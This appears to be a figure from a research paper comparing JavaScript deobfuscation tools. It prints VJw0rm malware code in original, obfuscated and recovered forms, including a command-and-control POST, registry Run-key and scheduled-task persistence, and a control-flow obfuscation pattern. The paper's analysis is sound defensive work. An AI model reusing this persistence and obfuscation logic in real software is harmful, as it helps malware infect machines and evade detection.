

```
//VJw0rm Command-and-Control contact
IServerXMLHTTPRequest2.open("POST",
    "http://280.214.239.36:8050/Vre", false);
IServerXMLHTTPRequest2.setRequestHeader("...");
IServerXMLHTTPRequest2.send();

//VJw0rm establishes persistency
IWshShell3.ExpandEnvironmentStrings("%TEMP%");
IFileSystem3.copyFile(".../Desktop/1.js",
    ".../AppData/local/1.js", "true");
IWshShell3.RegWrite(".../Windows/Version/Run/...",
    ".../AppData/local/1.js", "Reg_SZ")
IWshShell3.Run("Schtasks /create /sc /minute /mo 30...",
    ".../AppData/local/1.js");
```

a. Example Malware: VJworm

```
IServerXMLHTTPRequest2.open("POST",
    "http://280.214.239.36:8050/Vre", false);
IServerXMLHTTPRequest2.setRequestHeader("...");
IServerXMLHTTPRequest2.send();
IWshShell3.ExpandEnvironmentStrings("%TEMP%");
IFileSystem3.copyFile(".../Desktop/1.js",
    ".../AppData/local/1.js", "true");
IWshShell3.RegWrite(".../Windows/Version/Run/...",
    ".../AppData/local/1.js", "Reg_SZ")
IWshShell3.Run("Schtasks /create /sc /minute /mo 30...",
    ".../AppData/local/1.js");
```

d. Recovered By JSimpo

```
function _0x20c0(_0x5351f1, _0x4d0c85) {
    ...//many lines
}
var _0xf6fcf8 = _0x20c0;
(function(_0x1c3da7, _0x4a8c06) {
    var _0x280e = 1, _0x2ce5c3 = "405623";
    while (!![])
    {
        switch(_0x280e)
        {
            case 0: IServerXMLHTTPRequest2['setRequestHeader'](_0xf6fcf8(0x1a6)),
                _0x280e = parseInt(_0x2ce5c3[_0x280e]); break;
            case 1: IServerXMLHTTPRequest2[_0xf6fcf8(0x1a5)](_0xf6fcf8(0x1a3), _0xf6fcf8(0x193), ![]),
                _0x280e = parseInt(_0x2ce5c3[_0x280e]); break;
            case 2: IFileSystem3[_0xf6fcf8(0x196)](_0xf6fcf8(0x198), _0xf6fcf8(0x19f), _0xf6fcf8(0x18e)),
                _0x280e = parseInt(_0x2ce5c3[_0x280e]); break;
            case 3: IWshShell3[_0xf6fcf8(0x198)](_0xf6fcf8(0x192), _0xf6fcf8(0x19f)),
                _0x280e = parseInt(_0x2ce5c3[_0x280e]); break;
            case 4: IServerXMLHTTPRequest2[_0xf6fcf8(0x1a7)](),
                IWshShell3[_0xf6fcf8(0x190)](_0xf6fcf8(0x194)),
                _0x280e = parseInt(_0x2ce5c3[_0x280e]); break;
            case 5: IWshShell3['RegWrite'](_0xf6fcf8(0x18f), _0xf6fcf8(0x19f), _0xf6fcf8(0x19a)),
                _0x280e = parseInt(_0x2ce5c3[_0x280e]); break;
        }
        if (_0x280e == 6) break;
    }
})(_0xf6fcf8(0x192), 0xd0ce4));
```

b. Obfuscated VJworm

```
function aldyth(layerconf, mode) {
    ...//many lines
}
var kikumi = aldyth;
(function(canCreateDiscussions, layerconf) {
    var component = 1, archetype = "405623";
    for (; !![];) {
        switch(component) {
            case 0:
                IServerXMLHTTPRequest2["setRequestHeader"](kikumi(422));
                component = parseInt(archetype[component]); break;
            case 1:
                IServerXMLHTTPRequest2[kikumi(421)](kikumi(419), kikumi(403), ![]);
                component = parseInt(archetype[component]); break;
            case 2:
                IFileSystem3[kikumi(406)](kikumi(408), kikumi(415), kikumi(398));
                component = parseInt(archetype[component]); break;
            case 3:
                IWshShell3[kikumi(408)](kikumi(402), kikumi(415));
                component = parseInt(archetype[component]); break;
            case 4:
                IServerXMLHTTPRequest2[kikumi(423)]();
                IWshShell3[kikumi(400)](kikumi(404));
                component = parseInt(archetype[component]); break;
            case 5:
                IWshShell3["RegWrite"](kikumi(399), kikumi(415), kikumi(410));
                component = parseInt(archetype[component]); break;
        }
        if (component == 6) { break;}
    }
})(kikumi(402), 855268);
```

c. Recovered By SOTA